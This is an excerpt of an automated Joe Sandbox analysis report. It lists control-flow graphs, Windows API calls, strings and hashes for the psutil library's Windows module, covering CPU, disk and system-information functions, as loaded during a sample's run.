                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: DeallocErr_FromList_Windowsfree
                                                                                                                                                                                                                • String ID: (ddddd)$GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
                                                                                                                                                                                                                • API String ID: 2064544276-4027580629
                                                                                                                                                                                                                • Opcode ID: 3aba73f1beacce3b45a693e18e4e7de515b957251446303ddff290eb5a7b73cd
                                                                                                                                                                                                                • Instruction ID: 2f6c742223f405658dec5f539edb1b6818393cc663d19b5a8b414e024df7df36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3aba73f1beacce3b45a693e18e4e7de515b957251446303ddff290eb5a7b73cd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE71B971B18F428AE6369F37D450279A365AF5DB80B445332E98F62750FF3CE4458740

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Err_Process__acrt_iob_funcfprintf$FilenameFromOpenTokenWindowsWith$CurrentImpersonateSelfWarn
                                                                                                                                                                                                                • String ID: (originated from %s)$AdjustTokenPrivileges$ImpersonateSelf$LookupPrivilegeValue$OpenProcessToken$SeDebugPrivilege
                                                                                                                                                                                                                • API String ID: 2544101647-3705996988
                                                                                                                                                                                                                • Opcode ID: 7e459fa033e77e746eff1f6157e4fc365d5f228a077588dde54361fef94116c4
                                                                                                                                                                                                                • Instruction ID: 1a207646861f597956ab023fdec62c2691d1722f4de40106ca8b1d7550ef8764
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e459fa033e77e746eff1f6157e4fc365d5f228a077588dde54361fef94116c4
                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4512FA5B5CA8692E7709B72E4402A97764FF48784FC02036D6CD42669FF3DE549C780

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 29 7ffb9dd613d0-7ffb9dd613ff PyEval_SaveThread LoadLibraryA PyEval_RestoreThread 30 7ffb9dd61412-7ffb9dd61425 GetProcAddress 29->30 31 7ffb9dd61401-7ffb9dd61410 PyErr_SetFromWindowsErrWithFilename 29->31 33 7ffb9dd61458-7ffb9dd6146f GetModuleHandleA 30->33 34 7ffb9dd61427-7ffb9dd61439 PyErr_SetFromWindowsErrWithFilename FreeLibrary 30->34 32 7ffb9dd6143f-7ffb9dd61441 31->32 35 7ffb9dd61448-7ffb9dd61457 32->35 36 7ffb9dd61471-7ffb9dd61478 33->36 37 7ffb9dd6147a-7ffb9dd6148d GetProcAddress 33->37 34->32 38 7ffb9dd61496-7ffb9dd614b6 PyErr_SetFromWindowsErrWithFilename 36->38 39 7ffb9dd6148f 37->39 40 7ffb9dd614b7-7ffb9dd614ce GetModuleHandleA 37->40 39->38 41 7ffb9dd614d0-7ffb9dd614d7 40->41 42 7ffb9dd614d9-7ffb9dd614ec GetProcAddress 40->42 45 7ffb9dd614f5-7ffb9dd61515 PyErr_SetFromWindowsErrWithFilename 41->45 43 7ffb9dd614ee 42->43 44 7ffb9dd61516-7ffb9dd61542 PyEval_SaveThread LoadLibraryA PyEval_RestoreThread 42->44 43->45 46 7ffb9dd6156a-7ffb9dd6157d GetProcAddress 44->46 47 7ffb9dd61544-7ffb9dd61569 PyErr_SetFromWindowsErrWithFilename 44->47 48 7ffb9dd615b0-7ffb9dd615d4 call 7ffb9dd612c0 46->48 49 7ffb9dd6157f-7ffb9dd615af PyErr_SetFromWindowsErrWithFilename FreeLibrary 46->49 48->35 52 7ffb9dd615da-7ffb9dd615f7 call 7ffb9dd612c0 48->52 52->35 55 7ffb9dd615fd-7ffb9dd6161a call 7ffb9dd612c0 52->55 55->35 58 7ffb9dd61620-7ffb9dd6163d call 7ffb9dd612c0 55->58 58->35 61 7ffb9dd61643-7ffb9dd61660 call 7ffb9dd612c0 58->61 61->35 64 7ffb9dd61666-7ffb9dd61683 call 7ffb9dd612c0 61->64 64->35 67 7ffb9dd61689-7ffb9dd616a6 call 7ffb9dd612c0 64->67 67->35 70 7ffb9dd616ac-7ffb9dd616c9 call 7ffb9dd612c0 67->70 70->35 73 7ffb9dd616cf-7ffb9dd616df GetModuleHandleA 70->73 74 7ffb9dd616e1-7ffb9dd616e8 73->74 75 7ffb9dd616ea-7ffb9dd616fd GetProcAddress 73->75 76 7ffb9dd61706-7ffb9dd61726 PyErr_SetFromWindowsErrWithFilename 74->76 77 7ffb9dd616ff 75->77 78 7ffb9dd61727-7ffb9dd6174b call 7ffb9dd612c0 75->78 77->76 78->35 81 7ffb9dd61751-7ffb9dd61761 GetModuleHandleA 78->81 82 7ffb9dd6176c-7ffb9dd6177f GetProcAddress 81->82 83 7ffb9dd61763-7ffb9dd6176a 81->83 85 7ffb9dd61792-7ffb9dd617c1 call 7ffb9dd612c0 * 2 82->85 86 7ffb9dd61781 82->86 84 7ffb9dd61788-7ffb9dd61790 PyErr_SetFromWindowsErrWithFilename 83->84 84->85 90 7ffb9dd617c6-7ffb9dd61813 call 7ffb9dd612c0 * 2 PyErr_Clear 85->90 86->84
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_FilenameFromWindowsWith$AddressEval_LibraryProcThread$FreeHandleLoadModuleRestoreSave
                                                                                                                                                                                                                • String ID: GetActiveProcessorCount$GetExtendedTcpTable$GetExtendedUdpTable$GetLogicalProcessorInformationEx$GetTickCount64$NtQueryInformationProcess$NtQueryObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtResumeProcess$NtSetInformationProcess$NtSuspendProcess$RtlGetVersion$RtlIpv4AddressToStringA$RtlIpv6AddressToStringA$RtlNtStatusToDosErrorNoTeb$WTSEnumerateSessionsW$WTSFreeMemory$WTSQuerySessionInformationW$iphlpapi.dll$kernel32$ntdll$ntdll.dll$wtsapi32.dll
                                                                                                                                                                                                                • API String ID: 3787047288-761253638
                                                                                                                                                                                                                • Opcode ID: 6b7c78cd98652e75907c508de1284e9f0e804c7fc3037098929c04c6a191e3dd
                                                                                                                                                                                                                • Instruction ID: bd211ec6a54c2222bde44be3ab9c8ae0637f13dece9b7b562c90d0c19dab056e
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6b7c78cd98652e75907c508de1284e9f0e804c7fc3037098929c04c6a191e3dd
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E2C1AEE0B09F0790EAA49B76E99017923A5EF4C784FC67539C49D862A4FF6CF54983C0

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Err_Eval_FilenameFromLibraryThreadWindowsWith$AddressFreeLoadProcRestoreSave
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 568911590-0
                                                                                                                                                                                                                • Opcode ID: e2200b3415209b6f4be3470a672ca2eac9ae6c36c8dafb9bbec9a9066c3d2c4c
                                                                                                                                                                                                                • Instruction ID: 08d7c480e2c8a570ea629cbd0d6af18dfe5959b69401495764d726f26ba20fcd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: e2200b3415209b6f4be3470a672ca2eac9ae6c36c8dafb9bbec9a9066c3d2c4c
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B4011AA0B19E4685EA249B33F90813E63A5FF4CFC5B856034D98E07B68EE2CE0418280

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BuildErr_FromSystemTimesValueWindows
                                                                                                                                                                                                                • String ID: (ddd)
                                                                                                                                                                                                                • API String ID: 2325294781-2401937087
                                                                                                                                                                                                                • Opcode ID: ba0bdbf672466f0367906313a703a410643c45962e3f53d94245850bb14888e0
                                                                                                                                                                                                                • Instruction ID: a2f45b4bdce1c5824d37793843fa1531dab060e8df122e0a0d28164a3fa98e9b
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ba0bdbf672466f0367906313a703a410643c45962e3f53d94245850bb14888e0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: AB119A71F29E414FC563DB36D940915E3A5AFAD790B858322F54FB1E10F72CE0968B00

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: BuildErr_FromInfoPerformanceValueWindows
                                                                                                                                                                                                                • String ID: (LLLL)
                                                                                                                                                                                                                • API String ID: 964912588-1895995636
                                                                                                                                                                                                                • Opcode ID: 86683727f7044af2f3d4400d4c57e5fdd07758044f8fb3ec7329105bd5e8c26a
                                                                                                                                                                                                                • Instruction ID: 3c920c8667724db1a62a6024ac1c88278406eef6f6d2b7b682170b7c8f555a36
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86683727f7044af2f3d4400d4c57e5fdd07758044f8fb3ec7329105bd5e8c26a
                                                                                                                                                                                                                • Instruction Fuzzy Hash: C7014465B18A8481EA64DB72F41236AB364FFDD740FC06036D9CD43765EE2CD104CB40

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 439 7ffb9dd62e70-7ffb9dd62ecc memset PyList_New 440 7ffb9dd62ed2-7ffb9dd62f0f SetErrorMode PyArg_ParseTuple 439->440 441 7ffb9dd632fa-7ffb9dd63317 call 7ffb9dd6a0a0 439->441 442 7ffb9dd632b4-7ffb9dd632c0 SetErrorMode 440->442 443 7ffb9dd62f15-7ffb9dd62f4b PyObject_IsTrue PyEval_SaveThread GetLogicalDriveStringsA PyEval_RestoreThread 440->443 445 7ffb9dd632c2-7ffb9dd632c6 442->445 446 7ffb9dd632d1-7ffb9dd632d5 442->446 447 7ffb9dd62f4d-7ffb9dd62f5e PyErr_SetFromWindowsErr SetErrorMode 443->447 448 7ffb9dd62f63-7ffb9dd62f6a 443->448 445->446 450 7ffb9dd632c8-7ffb9dd632cb _Py_Dealloc 445->450 451 7ffb9dd632e0 446->451 452 7ffb9dd632d7-7ffb9dd632da _Py_Dealloc 446->452 447->446 453 7ffb9dd62f70-7ffb9dd62f7a 448->453 454 7ffb9dd6329d-7ffb9dd632a9 SetErrorMode 448->454 450->446 455 7ffb9dd632e2-7ffb9dd632f2 451->455 452->451 456 7ffb9dd62f80-7ffb9dd62fb1 PyEval_SaveThread GetDriveTypeA PyEval_RestoreThread 453->456 454->455 455->441 457 7ffb9dd62fe9-7ffb9dd6302f GetVolumeInformationA 456->457 458 7ffb9dd62fb3-7ffb9dd62fb6 456->458 461 7ffb9dd63031-7ffb9dd63046 strcat_s SetLastError 457->461 462 7ffb9dd6304b-7ffb9dd6305a 457->462 459 7ffb9dd62fb8-7ffb9dd62fc0 458->459 460 7ffb9dd62fc6-7ffb9dd62fc9 458->460 459->460 466 7ffb9dd63284-7ffb9dd63297 strchr 459->466 460->457 467 7ffb9dd62fcb-7ffb9dd62fcd 460->467 463 7ffb9dd63194-7ffb9dd6319b 461->463 464 7ffb9dd6305c 462->464 465 7ffb9dd63063-7ffb9dd63071 strcat_s 462->465 468 7ffb9dd631a2-7ffb9dd631a9 463->468 464->465 469 7ffb9dd63090-7ffb9dd63094 465->469 470 7ffb9dd63073-7ffb9dd6308c strcat_s 465->470 466->454 466->456 471 7ffb9dd62fd0-7ffb9dd62fdc 467->471 468->468 472 7ffb9dd631ab-7ffb9dd631ae 468->472 473 7ffb9dd630b3-7ffb9dd630b5 469->473 474 7ffb9dd63096-7ffb9dd630af strcat_s 469->474 470->469 471->457 475 7ffb9dd62fde-7ffb9dd62fe2 471->475 476 7ffb9dd631b0-7ffb9dd631c3 strcat_s 472->476 477 7ffb9dd631c9-7ffb9dd631cc 472->477 473->463 478 7ffb9dd630bb-7ffb9dd630d8 FindFirstVolumeMountPointA 473->478 474->473 475->471 479 7ffb9dd62fe4 475->479 476->477 480 7ffb9dd63220-7ffb9dd63263 strcat_s Py_BuildValue 477->480 481 7ffb9dd631ce-7ffb9dd631dc 477->481 482 7ffb9dd630de 478->482 483 7ffb9dd6318d 478->483 479->466 480->442 486 7ffb9dd63265-7ffb9dd63273 PyList_Append 480->486 481->480 485 7ffb9dd630e0-7ffb9dd6313c strcpy_s strcat_s Py_BuildValue 482->485 483->463 487 7ffb9dd63142-7ffb9dd63151 PyList_Append 485->487 488 7ffb9dd632ab-7ffb9dd632ae FindVolumeMountPointClose 485->488 486->442 489 7ffb9dd63275-7ffb9dd63279 486->489 487->488 490 7ffb9dd63157-7ffb9dd6315b 487->490 488->442 489->466 491 7ffb9dd6327b-7ffb9dd6327e _Py_Dealloc 489->491 492 7ffb9dd6315d-7ffb9dd63160 _Py_Dealloc 490->492 493 7ffb9dd63166-7ffb9dd6317e FindNextVolumeMountPointA 490->493 491->466 492->493 493->485 494 7ffb9dd63184-7ffb9dd63187 FindVolumeMountPointClose 493->494 494->483
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorEval_ModeThread$DeallocDriveRestoreSave$Arg_Err_FromList_LogicalObject_ParseStringsTrueTupleTypeWindowsmemsetstrchr
                                                                                                                                                                                                                • String ID: (ssss)$,compressed$,readonly$A:\
                                                                                                                                                                                                                • API String ID: 1159295088-641188810
                                                                                                                                                                                                                • Opcode ID: f05961b23bf45abea38e3d347efde3a6e8441f966b98cf86d26a42af54087c04
                                                                                                                                                                                                                • Instruction ID: fb66c67e7df3fb84f5544e7161ae38355dcebf325c095de244c7f19bb96074a4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: f05961b23bf45abea38e3d347efde3a6e8441f966b98cf86d26a42af54087c04
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86C170A1B08A8686EB30DF72E8046B963A4FF4DB54FC46135C99E46694FF3CE509C780

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 587 7ffb9dd62b00-7ffb9dd62b27 PyDict_New 588 7ffb9dd62d3e-7ffb9dd62d57 call 7ffb9dd6a0a0 587->588 589 7ffb9dd62b2d-7ffb9dd62b6d 587->589 590 7ffb9dd62b70-7ffb9dd62bbc call 7ffb9dd629d0 CreateFileA 589->590 595 7ffb9dd62d00-7ffb9dd62d05 590->595 596 7ffb9dd62bc2-7ffb9dd62bfd DeviceIoControl 590->596 595->590 597 7ffb9dd62d0b 595->597 598 7ffb9dd62bff 596->598 599 7ffb9dd62c54-7ffb9dd62cc0 call 7ffb9dd629d0 Py_BuildValue 596->599 600 7ffb9dd62d0e-7ffb9dd62d36 597->600 601 7ffb9dd62c00-7ffb9dd62c09 GetLastError 598->601 606 7ffb9dd62e3d-7ffb9dd62e41 599->606 607 7ffb9dd62cc6-7ffb9dd62cdf PyDict_SetItemString 599->607 600->588 604 7ffb9dd62c0f-7ffb9dd62c15 601->604 605 7ffb9dd62d58-7ffb9dd62d61 GetLastError 601->605 610 7ffb9dd62c1b-7ffb9dd62c52 DeviceIoControl 604->610 611 7ffb9dd62e1e-7ffb9dd62e26 PyErr_SetFromWindowsErr 604->611 608 7ffb9dd62dcd-7ffb9dd62dd6 GetLastError 605->608 609 7ffb9dd62d63-7ffb9dd62d6a 605->609 617 7ffb9dd62e4c-7ffb9dd62e4f 606->617 618 7ffb9dd62e43-7ffb9dd62e46 _Py_Dealloc 606->618 612 7ffb9dd62e28-7ffb9dd62e32 607->612 613 7ffb9dd62ce5-7ffb9dd62cec 607->613 608->611 614 7ffb9dd62dd8-7ffb9dd62ddf 608->614 615 7ffb9dd62d6c-7ffb9dd62d9c __acrt_iob_func call 7ffb9dd61d70 __acrt_iob_func 609->615 616 7ffb9dd62cf7-7ffb9dd62cfa CloseHandle 609->616 610->599 610->601 611->606 612->606 623 7ffb9dd62e34-7ffb9dd62e37 _Py_Dealloc 612->623 613->616 621 7ffb9dd62cee-7ffb9dd62cf1 _Py_Dealloc 613->621 614->616 622 7ffb9dd62de5-7ffb9dd62e1c __acrt_iob_func call 7ffb9dd61d70 __acrt_iob_func 614->622 627 7ffb9dd62da3-7ffb9dd62dc8 call 7ffb9dd61d70 __acrt_iob_func call 7ffb9dd61d70 615->627 616->595 619 7ffb9dd62e51-7ffb9dd62e54 CloseHandle 617->619 620 7ffb9dd62e5a-7ffb9dd62e5c 617->620 618->617 619->620 620->600 621->616 622->627 623->606 627->616
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: __acrt_iob_func$fprintf$DeallocErrorLast$CloseControlDeviceDict_Handleswprintf_s$BuildCreateErr_FileFromItemStringValueWindows__stdio_common_vsprintf_s
                                                                                                                                                                                                                • String ID: $(IILLKK)$DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i$DeviceIoControl -> ERROR_NOT_SUPPORTED; ignore PhysicalDrive%i$PhysicalDrive%i$\\.\PhysicalDrive%d$psutil-debug [%s:%d]> $psutil/arch/windows\disk.c
                                                                                                                                                                                                                • API String ID: 3661822457-4277503146
                                                                                                                                                                                                                • Opcode ID: b432df3f823cbfe8d6a75763a0cf0921735d2c52f549eb0bb12dc7f174602705
                                                                                                                                                                                                                • Instruction ID: 84eb35d422f72a132cc5ac07dfa20c8ff2c74618f010d510102cad515eac2f72
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b432df3f823cbfe8d6a75763a0cf0921735d2c52f549eb0bb12dc7f174602705
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E69121B1B08B8282E7309B26E4546A977A4FF49B90F802136D9CD43B65FF3CE545C780

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                control_flow_graph 633 7ffb9dd62480-7ffb9dd624b4 634 7ffb9dd624d4-7ffb9dd624da 633->634 635 7ffb9dd624b6-7ffb9dd624c1 633->635 636 7ffb9dd62531-7ffb9dd62539 634->636 637 7ffb9dd624dc-7ffb9dd6252c __acrt_iob_func call 7ffb9dd61d70 __acrt_iob_func call 7ffb9dd61d70 __acrt_iob_func call 7ffb9dd61d70 634->637 641 7ffb9dd62556-7ffb9dd6256c malloc 635->641 642 7ffb9dd624c7-7ffb9dd624cf PyErr_SetFromWindowsErr 635->642 640 7ffb9dd6253b-7ffb9dd62554 PyErr_SetString 636->640 636->641 637->636 640->641 644 7ffb9dd625a7-7ffb9dd625c5 640->644 645 7ffb9dd6256e-7ffb9dd62574 PyErr_NoMemory 641->645 646 7ffb9dd62576-7ffb9dd6258e NtQuerySystemInformation 641->646 642->644 645->644 647 7ffb9dd62590-7ffb9dd62599 call 7ffb9dd61350 646->647 648 7ffb9dd625c6-7ffb9dd625dc malloc 646->648 654 7ffb9dd6259e 647->654 651 7ffb9dd625de-7ffb9dd625e4 PyErr_NoMemory 648->651 652 7ffb9dd625e6-7ffb9dd62600 NtQuerySystemInformation 648->652 651->654 655 7ffb9dd62602-7ffb9dd62609 652->655 656 7ffb9dd6260b-7ffb9dd6260d 652->656 658 7ffb9dd625a1 free 654->658 659 7ffb9dd62670-7ffb9dd62672 call 7ffb9dd61350 655->659 660 7ffb9dd6262f-7ffb9dd62643 malloc 656->660 661 7ffb9dd6260f-7ffb9dd6261b 656->661 658->644 668 7ffb9dd62677-7ffb9dd6268e free * 2 659->668 664 7ffb9dd6264d-7ffb9dd62667 NtQuerySystemInformation 660->664 665 7ffb9dd62645-7ffb9dd6264b PyErr_NoMemory 660->665 663 7ffb9dd62620-7ffb9dd6262d 661->663 663->660 663->663 666 7ffb9dd6269c-7ffb9dd626a2 664->666 667 7ffb9dd62669 664->667 665->668 670 7ffb9dd6279e-7ffb9dd627a3 666->670 671 7ffb9dd626a8-7ffb9dd626b5 666->671 667->659 668->644 669 7ffb9dd62694-7ffb9dd62697 668->669 669->658 673 7ffb9dd62806-7ffb9dd62840 free * 3 Py_BuildValue 670->673 674 7ffb9dd627a5-7ffb9dd627b0 670->674 672 7ffb9dd626c0-7ffb9dd62775 671->672 672->672 675 7ffb9dd6277b-7ffb9dd62799 672->675 676 7ffb9dd627b2-7ffb9dd627d8 674->676 677 7ffb9dd627f4-7ffb9dd627fb 674->677 675->670 678 7ffb9dd627e0-7ffb9dd627ed 676->678 679 7ffb9dd62800-7ffb9dd62803 677->679 678->678 680 7ffb9dd627ef-7ffb9dd627f2 678->680 679->673 680->677 680->679
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000010.00000002.2222153578.00007FFB9DD61000.00000020.00000001.01000000.00000041.sdmp, Offset: 00007FFB9DD60000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000010.00000002.2221230976.00007FFB9DD60000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222262579.00007FFB9DD6B000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222404588.00007FFB9DD70000.00000004.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000010.00000002.2222474357.00007FFB9DD71000.00000002.00000001.01000000.00000041.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_16_2_7ffb9dd60000_check.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: free$Err_$InformationMemoryQuerySystem__acrt_iob_funcfprintfmalloc$BuildFromStringValueWindows
                                                                                                                                                                                                                • String ID: GetActiveProcessorCount() not available; using GetSystemInfo()$GetSystemInfo() failed to retrieve CPU count$NtQuerySystemInformation(SystemInterruptInformation)$NtQuerySystemInformation(SystemPerformanceInformation)$NtQuerySystemInformation(SystemProcessorPerformanceInformation)$kkkk$psutil-debug [%s:%d]> $psutil/arch/windows\cpu.c
